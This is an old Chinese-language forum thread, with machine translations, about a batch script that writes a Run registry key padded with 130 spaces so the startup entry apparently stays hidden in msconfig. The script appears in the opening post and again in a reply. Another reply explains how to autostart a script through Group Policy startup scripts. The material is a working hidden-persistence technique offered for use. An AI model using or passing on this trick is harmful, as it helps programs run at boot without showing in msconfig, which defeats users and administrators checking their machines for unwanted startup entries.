|
s11ss
银牌会员
    
积分 2098
发帖 566
注册 2007-9-11
状态 离线
|
  『楼 主』:
[原创]建立在msconfig中不显示的开机启动项{xp下测试通过}
使用 LLM 解释/回答一下
::A Bug of Msconfig {s11ss@www.cn-dos.net 2008-3-19}
@if "%~1" equ "" echo Usage:&echo "%~n0" "filename "&pause&exit/b
@setlocal enabledelayedexpansion
@set "e="
@for /l %%a in (1,1,130) do @set "e=!e! "
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "%random%" /d "%~1!e!" /f
@pause
::Windows配置实用程序的一个漏洞 {s11ss@www.cn-dos.net 2008-3-19}
@if "%~1" equ "" echo Usage:&echo "%~n0" "filename "&pause&exit/b
@setlocal enabledelayedexpansion
@set "e="
@for /l %%a in (1,1,130) do @set "e=!e! "
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "%random%" /d "%~1!e!" /f
@pause
|
|
2008-3-19 14:55 |
|
|
huahua0919
银牌会员
    
积分 1608
发帖 780
注册 2007-10-7
状态 离线
|
『第 2 楼』:
使用 LLM 解释/回答一下
是不是空到达130就能产生这样的效果
Is reaching 130 in the empty can produce such an effect?
|
|
2008-3-19 17:09 |
|
|
HAT
版主
       
积分 9023
发帖 5017
注册 2007-5-31
状态 离线
|
『第 3 楼』:
使用 LLM 解释/回答一下
看来msconfig里面没有对启动项名称开头的空格进行检测啊,学习了。
It seems that msconfig doesn't have a check for spaces at the beginning of startup item names. Learned it.
|
|
2008-3-20 00:28 |
|
|
suntb
高级用户
   
积分 581
发帖 277
注册 2006-12-23
状态 离线
|
|
2008-3-20 00:37 |
|
|
plp626
银牌会员
     钻石会员
积分 2278
发帖 1020
注册 2007-11-19
状态 离线
|
『第 5 楼』:
使用 LLM 解释/回答一下
这个在msconfig不可见,还不改注册表:
让p处理在开机、关机时运行
在“开始/运行”输入“mmc”回车进入控制台,在“添加/删除管理单元”中添加“组策略对象编辑器”完成后在“扩展”选项卡中选“脚本(启动/关机)”,然后在控制台的“控制台根节点/本地计算机策略/计算机配置/windows设置/脚本(启动/关机)”中双击“启动/关机”项,再点击“添加”命令使用浏览定位到我们要运行的p处理就ok了。
This is not visible in msconfig and needs to be modified in the registry:
Make the p process run during startup and shutdown
Enter "mmc" in "Start/Run" and press Enter to enter the console. Add "Group Policy Object Editor" in "Add/Remove Snap-ins". After completion, select "Scripts (Startup/Shutdown)" in the "Extensions" tab. Then double-click the "Startup/Shutdown" item in "Console Root/Local Computer Policy/Computer Configuration/Windows Settings/Scripts (Startup/Shutdown)" in the console, and then click the "Add" command to use browse to locate the p process we want to run, and it's done.
|

山外有山,人外有人;低调做人,努力做事。
进入网盘(各种工具)~~ 空间~~cmd学习 |
|
2008-3-20 10:33 |
|
|
slore
铂金会员
      
积分 5212
发帖 2478
注册 2007-2-8
状态 离线
|
『第 6 楼』:
使用 LLM 解释/回答一下
???
前面不知道有打钩的那个checkbox没呢?
???
Is there a checkbox with a checkmark in front that I don't know about?
|
|
2008-3-21 23:45 |
|
|
lfopt
初级用户
 
积分 71
发帖 34
注册 2008-3-12
状态 离线
|
『第 7 楼』:
使用 LLM 解释/回答一下
能不能出来解读下呀,看不懂呀
Can you come out and explain it? I can't understand it
|
|
2008-3-22 01:16 |
|
|
afeichai
初级用户
 
积分 171
发帖 78
注册 2006-11-22
状态 离线
|
『第 8 楼』:
使用 LLM 解释/回答一下
不知到我理解的是否有问题,改为下面的代码,可是“垃圾清理.vbs”启动的时候不能运行,另外在注册表里面也看不到该项,是哪里出问题了?请楼主给个示例。汗,我太菜了
::A Bug of Msconfig {s11ss@www.cn-dos.net 2008-3-19}
@if "%~1" equ "" echo Usage:&echo "垃圾清理" "c:\windows\垃圾清理.vbs"&pause&exit/b
@setlocal enabledelayedexpansion
@set "e="
@for /l %%a in (1,1,130) do @set "e=!e! "
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "%random%" /d "%~1!e!" /f
@pause
I'm not sure if my understanding is wrong. I changed it to the following code, but when "垃圾清理.vbs" starts, it can't run, and I can't see the item in the registry. Where is the problem? Please the楼主 give an example. Sweat, I'm too novice
::A Bug of Msconfig {s11ss@www.cn-dos.net 2008-3-19}
@if "%~1" equ "" echo Usage:&echo "垃圾清理" "c:\windows\垃圾清理.vbs"&pause&exit/b
@setlocal enabledelayedexpansion
@set "e="
@for /l %%a in (1,1,130) do @set "e=!e! "
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "%random%" /d "%~1!e!" /f
@pause
|
|
2008-3-22 12:55 |
|
|
tireless
银牌会员
    
积分 2025
发帖 1122
注册 2007-9-5
状态 离线
|
|
2008-10-9 12:11 |
|
|
23112656
中级用户
  
积分 220
发帖 99
注册 2008-6-26
状态 离线
|
『第 10 楼』:
使用 LLM 解释/回答一下
这样不就方便黑了吗?
Isn'that would make it easy to hack, wouldn't it?'
|
|
2008-10-9 16:23 |
|
|
toms
新手上路

积分 10
发帖 5
注册 2008-10-9
状态 离线
|
|
2008-10-9 23:39 |
|
|
mimi820
初级用户
 
积分 35
发帖 20
注册 2008-10-2
状态 离线
|
|
2008-10-10 22:14 |
|
|
jieorlin
新手上路

积分 2
发帖 2
注册 2009-2-27
状态 离线
|
『第 13 楼』:
使用 LLM 解释/回答一下
那么别的工具检测到么???
Then, is it detected by other tools???
|
|
2009-6-8 13:06 |
|
|
tempuser
高级用户
   
积分 547
发帖 261
注册 2006-4-15
状态 离线
|
|
2009-6-8 20:01 |
|